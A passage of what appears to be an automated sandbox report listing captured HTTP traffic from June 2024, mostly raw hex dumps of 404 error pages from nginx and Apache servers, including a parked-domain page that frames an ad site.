f1 ed f9 f6 9b fc 87 bf fd d2 e6 d4 d6 c3 fb 1f ab e1 93 7d bd 7d f3 87 fb e7 f5 7c fc b0 cc 40 a1 4a f3 f9 66 15 aa 97 f7 c7 da de 6f de df 7c a7 45 39 c2 56 e7 1b 8f ac bf 39 2a b2 5c 70 08 56 5f 8f 06 ff f6 db 33 b1 b7 7e bb 8e 37 ff ff f9 a9 ad 9a 39 c0 dd fd b3 b5 64 6f a7 af f3 23 2b fa 37 6f d3 eb 9d 9f e6 ca 6f 6e 15 3a c2 40 c8 ec 82 f3 4d 14 38 36 f0 0b 3f de 06 07 4e a6 6e 7d 3d bf ff 70 be 65 37 59 cd 58 15 e7 42 98 32 fb a6 47 72 c0 c8 81 99 ae f3 5d 39 b7 f3 eb a7 e3 87 ed e7 3e 4e 87 02 fe 77 3f b3 70 66 eb ed e7 b6 63 f5 de 71 7f f2 86 6f f9 76 86 20 44 88 d1 7b e5 dd dd dd 99 9c 62 a7 b7 9f 9b 56 42 0d 48 d1 14 38 0a e7 b9 4d 1d e9 43 12 f4 32 e3 26 32 a1 09 07 d7 82 53 7f fb b9 f9 5c 7e f9 57 f9 7c fb 0b 6f fa 09 fe 82 b6 cb 4f f7 c7 9d b6 e0 e6 20 39 bf 6c 8d 80 51 06 c2 52 ff 7c b3 40 31 61 c3 c1 e2 e6 87 7a 43 54 9e 6e 1f ee bf 6b 6a 86 cf 0f e3 90 26 1d 85 82 f6 4b 53 60 9d 5f 40 2c c7 be af 13 cf 85 b9 0f c2 9e f3 f8 4a 6a 07 4f 9f df 68 c7 65 ab 64 fc a1 26 0e 79 02 ad 3a 37 79 79 bd 8d 92 69 95 49 a2 98 b3 cf f6 4e 68 11 8c 59 ec e9 d6 55 f3 a6 8e bf f4 19 b5 d6 9b b7 af 5f 47 d4 fa ee 1e fa 7e ba 36 e5 60 61 bc
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 19 Jun 2024 20:41:13 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingX-Httpd: 1Host-Header: 8441280b0c35cbc1147f8ba998a563a7X-Proxy-Cache-Info: DT:1Content-Encoding: brData Raw: 33 37 32 30 0d 0a 55 57 47 21 8a 8a 5e 0f cb 0e 30 5c 93 7a 00 54 06 c6 ee 80 58 b6 e3 7a be fd ef 7b 7f 7e ce 7b 32 ba 85 43 da 67 69 87 c8 ff fc 32 2d 3b 3f ec 2c 57 31 51 3d 3d 40 c2 7d 41 01 94 ab fd ff b7 69 15 92 ec 01 74 67 1d ce 2e 87 1b 6f 04 00 31 71 de be ef bf f7 7b 7e 49 76 ef 97 e1 9c 92 ba fb 9c d2 a0 3c 28 37 da 0b 55 5f 55 35 65 b5 dd 2b 43 03 c1 20 c9 83 9e 45 0c 37 c9 19 c3 60 92 70 29 c8 82 0d 17 fe ff 7f ef e7 27 2d 87 8c 8c 3e 80 86 1f 21 87 84 52 06 50 be 67 cf b9 db 4f 69 8c e7 5c ce 6a 64 9b 09 1a dd b7 54 67 8f ea 9c d5 4c 0e 19 3b 63 dc 2a e2 74 19 f0 29 6b 03 46 d9 07 f2 d7 78 ad 79 5c df ed 3f 09 8a 05 01 f1 1a bc ff cb e4 3d 57 ec 60 d5 c1 c2 2f a9 f5 a7 60 93 c2 ff de d7 f7 5b fb 78 be e4 29 0d 08 2f 36 37 45 41 32 94 f9 e6 87 d5 83 9c 60 f6 2b e5 21 f1 d6 16 72 58 5c 49 f0 2f fe f4 ed 11 7f d0 b1 b8 b2 80 88 a4 c3 b6 5e 4c 64 9a 95 ff bb 16 43 b6 4e f2 c0 10 62 82 da 38 49 c0 c0 6f bf 93 1a 84 b4 f7 c5 d9 ed e3 37 38 8c 6c db b6 fd fa 8d 1c 85 0d de 7f 8a 8b b3 cf cf 77 ab cf b6 17 0d 94 d8 c5 5e 32 67 14 a9 df 44 31 e1 62 f6 41 da 78 56 3a 36 17 62 8e 0c 37 ef bb e7 e7 0f eb f6 e3 e7 fb 2f 17 67 d2 8f fc 5f 03 5b 7f 7a bf 8f bc f2 f1 fd fa d3 59 7f ce f4 70 fc b6 8e 6f 6f 2f 98 26 37 a7 c5 c7 f7 82 0c 75 50 22 9b c7 d9 b7 b5 fd db fb e7 4d e4 a1 5f 91 a6 9a 1d 7f bf 7f fc c3 f6 89 15 e0 c8 2a 77 ef 1f 9f 9f 60 f3 95 e3 87 fb 27 4b 80 dd 28 25 b4 ba f8 f7 0f b7 8f 7f f3 df c7 c7 a7 73 d7 a9 2d e6 3f ab 97 ff 45 4f df fb 85 8c 5a a4 26 c2 10 48 9d 9e d5 cc a5 bf de 7e d6 f1 ca 7f f3 fe 9b 3b 1f e7 fe f1 ed f9 f6 9b fc 87 bf fd d2 e6 d4 d6 c3 fb 1f ab e1 93 7d bd 7d f3 87 fb e7 f5 7c fc b0 cc 40 a1 4a f3 f9 66 15 aa 97 f7 c7 da de 6f de df 7c a7 45 39 c2 56 e7 1b 8f ac bf 39 2a b2 5c 70 08 56 5f 8f 06 ff f6 db 33 b1 b7 7e bb 8e 37 ff ff f9 a9 ad 9a 39 c0 dd fd b3 b5 64 6f a7 af f3 23 2b fa 37 6f d3 eb 9d 9f e6 ca 6f 6e 15 3a c2 40 c8 ec 82 f3 4d 14 38 36 f0 0b 3f de 06 07 4e a6 6e 7d 3d bf ff 70 be 65 37 59 cd 58 15 e7 42 98 32 fb a6 47 72 c0 c8 81 99 ae f3 5d 39 b7 f3 eb a7 e3 87 ed e7 3e 4e 87 02 fe 77 3f b3 70 66 eb ed e7 b6 63 f5 de 71 7f f2 86 6f f9 76 86 20 44 88 d1 7b e5 dd dd dd 99 9c 62 a7 b7 9f 9b 56 42 0d 48 d1 14 38 0a e7 b9 4d 1d e9 43 12 f4 32 e3 26 32 a1 09 07 d7 82 53 7f fb b9 f9 5c 7e f9 57 f9 7c fb 0b 6f fa 09 fe 82 b6 cb 4f f7 c7 9d b6 e0 e6 20 39 bf 6c 8d 80 51 06 c2 52 ff 7c b3 40 31 61 c3 c1 e2 e6 87 7a 43 54 9e 6e 1f ee bf 6b 6a 86 cf 0f e3 90 26 1d 85 82 f6 4b 53 60 9d 5f 40 2c c7 be af 13 cf 85 b9 0f c2 9e f3 f8 4a 6a 07 4f 9f df 68 c7 65 ab 64 fc a1 26 0e 79 02 ad 3a 37 79 79 bd 8d 92 69 95 49 a2 98 b3 cf f6 4e 68 11 8c 59 ec e9 d6 55 f3 a6 8e bf f4 19 b5 d6 9b b7 af 5f 47 d4 fa ee 1e fa 7e ba 36 e5 60 61 bc
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 19 Jun 2024 20:41:15 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingX-Httpd: 1Host-Header: 8441280b0c35cbc1147f8ba998a563a7X-Proxy-Cache-Info: DT:1Content-Encoding: brData Raw: 33 37 32 30 0d 0a 55 57 47 21 8a 8a 5e 0f cb 0e 30 5c 93 7a 00 54 06 c6 ee 80 58 b6 e3 7a be fd ef 7b 7f 7e ce 7b 32 ba 85 43 da 67 69 87 c8 ff fc 32 2d 3b 3f ec 2c 57 31 51 3d 3d 40 c2 7d 41 01 94 ab fd ff b7 69 15 92 ec 01 74 67 1d ce 2e 87 1b 6f 04 00 31 71 de be ef bf f7 7b 7e 49 76 ef 97 e1 9c 92 ba fb 9c d2 a0 3c 28 37 da 0b 55 5f 55 35 65 b5 dd 2b 43 03 c1 20 c9 83 9e 45 0c 37 c9 19 c3 60 92 70 29 c8 82 0d 17 fe ff 7f ef e7 27 2d 87 8c 8c 3e 80 86 1f 21 87 84 52 06 50 be 67 cf b9 db 4f 69 8c e7 5c ce 6a 64 9b 09 1a dd b7 54 67 8f ea 9c d5 4c 0e 19 3b 63 dc 2a e2 74 19 f0 29 6b 03 46 d9 07 f2 d7 78 ad 79 5c df ed 3f 09 8a 05 01 f1 1a bc ff cb e4 3d 57 ec 60 d5 c1 c2 2f a9 f5 a7 60 93 c2 ff de d7 f7 5b fb 78 be e4 29 0d 08 2f 36 37 45 41 32 94 f9 e6 87 d5 83 9c 60 f6 2b e5 21 f1 d6 16 72 58 5c 49 f0 2f fe f4 ed 11 7f d0 b1 b8 b2 80 88 a4 c3 b6 5e 4c 64 9a 95 ff bb 16 43 b6 4e f2 c0 10 62 82 da 38 49 c0 c0 6f bf 93 1a 84 b4 f7 c5 d9 ed e3 37 38 8c 6c db b6 fd fa 8d 1c 85 0d de 7f 8a 8b b3 cf cf 77 ab cf b6 17 0d 94 d8 c5 5e 32 67 14 a9 df 44 31 e1 62 f6 41 da 78 56 3a 36 17 62 8e 0c 37 ef bb e7 e7 0f eb f6 e3 e7 fb 2f 17 67 d2 8f fc 5f 03 5b 7f 7a bf 8f bc f2 f1 fd fa d3 59 7f ce f4 70 fc b6 8e 6f 6f 2f 98 26 37 a7 c5 c7 f7 82 0c 75 50 22 9b c7 d9 b7 b5 fd db fb e7 4d e4 a1 5f 91 a6 9a 1d 7f bf 7f fc c3 f6 89 15 e0 c8 2a 77 ef 1f 9f 9f 60 f3 95 e3 87 fb 27 4b 80 dd 28 25 b4 ba f8 f7 0f b7 8f 7f f3 df c7 c7 a7 73 d7 a9 2d e6 3f ab 97 ff 45 4f df fb 85 8c 5a a4 26 c2 10 48 9d 9e d5 cc a5 bf de 7e d6 f1 ca 7f f3 fe 9b 3b 1f e7 fe f1 ed f9 f6 9b fc 87 bf fd d2 e6 d4 d6 c3 fb 1f ab e1 93 7d bd 7d f3 87 fb e7 f5 7c fc b0 cc 40 a1 4a f3 f9 66 15 aa 97 f7 c7 da de 6f de df 7c a7 45 39 c2 56 e7 1b 8f ac bf 39 2a b2 5c 70 08 56 5f 8f 06 ff f6 db 33 b1 b7 7e bb 8e 37 ff ff f9 a9 ad 9a 39 c0 dd fd b3 b5 64 6f a7 af f3 23 2b fa 37 6f d3 eb 9d 9f e6 ca 6f 6e 15 3a c2 40 c8 ec 82 f3 4d 14 38 36 f0 0b 3f de 06 07 4e a6 6e 7d 3d bf ff 70 be 65 37 59 cd 58 15 e7 42 98 32 fb a6 47 72 c0 c8 81 99 ae f3 5d 39 b7 f3 eb a7 e3 87 ed e7 3e 4e 87 02 fe 77 3f b3 70 66 eb ed e7 b6 63 f5 de 71 7f f2 86 6f f9 76 86 20 44 88 d1 7b e5 dd dd dd 99 9c 62 a7 b7 9f 9b 56 42 0d 48 d1 14 38 0a e7 b9 4d 1d e9 43 12 f4 32 e3 26 32 a1 09 07 d7 82 53 7f fb b9 f9 5c 7e f9 57 f9 7c fb 0b 6f fa 09 fe 82 b6 cb 4f f7 c7 9d b6 e0 e6 20 39 bf 6c 8d 80 51 06 c2 52 ff 7c b3 40 31 61 c3 c1 e2 e6 87 7a 43 54 9e 6e 1f ee bf 6b 6a 86 cf 0f e3 90 26 1d 85 82 f6 4b 53 60 9d 5f 40 2c c7 be af 13 cf 85 b9 0f c2 9e f3 f8 4a 6a 07 4f 9f df 68 c7 65 ab 64 fc a1 26 0e 79 02 ad 3a 37 79 79 bd 8d 92 69 95 49 a2 98 b3 cf f6 4e 68 11 8c 59 ec e9 d6 55 f3 a6 8e bf f4 19 b5 d6 9b b7 af 5f 47 d4 fa ee 1e fa 7e ba 36 e5 60 61 bc
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 19 Jun 2024 20:41:18 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingX-Httpd: 1Host-Header: 6b7412fb82ca5edfd0917e3957f05d89X-Proxy-Cache: MISSX-Proxy-Cache-Info: 0 NC:000000 UP:Data Raw: 31 33 64 35 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 73 74 6f 72 65 2c 6d 61 78 2d 61 67 65 3d 30 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 37 30 30 25 37 43 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 20 7b 0a 20 20 20 20 20 20 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 20 20 20 20 20 20 20 20 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 20 20 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 74 61 70 2d 68 69 67 68 6c 69 67 68 74 2d 63 6f 6c 6f 72 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 0a 20 20 20 20 7d 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a 75 73 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 7d 0a 20 20 20 20 2e 66 69 74 2d 77 69 64 65 20 7b 0a 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 20 20 20 20 20 20 20 20 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 0a 20 20 20 20 20 20 20 20 6d 61 78 2d 77 69 64 74 68 3a 20 31 32 34 30 70 78 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 36 30 70 78 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 36 30 70 78 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 32 30 70
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 19 Jun 2024 20:41:32 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 68 63 61 77 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /hcaw/ was not found on this server.</p></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 19 Jun 2024 20:41:35 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 68 63 61 77 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /hcaw/ was not found on this server.</p></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 19 Jun 2024 20:41:37 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 68 63 61 77 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /hcaw/ was not found on this server.</p></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 19 Jun 2024 20:41:38 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingData Raw: 30 0d 0a 0d 0a Data Ascii: 0
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 19 Jun 2024 20:41:40 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 68 63 61 77 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /hcaw/ was not found on this server.</p></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 19 Jun 2024 20:41:45 GMTContent-Type: text/htmlContent-Length: 867Connection: closeServer: ApacheLast-Modified: Fri, 10 Jan 2020 16:05:10 GMTAccept-Ranges: bytesAge: 0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 74 72 28 27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%; }
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 19 Jun 2024 20:41:48 GMTContent-Type: text/htmlContent-Length: 867Connection: closeServer: ApacheLast-Modified: Fri, 10 Jan 2020 16:05:10 GMTAccept-Ranges: bytesAge: 0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 74 72 28 27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 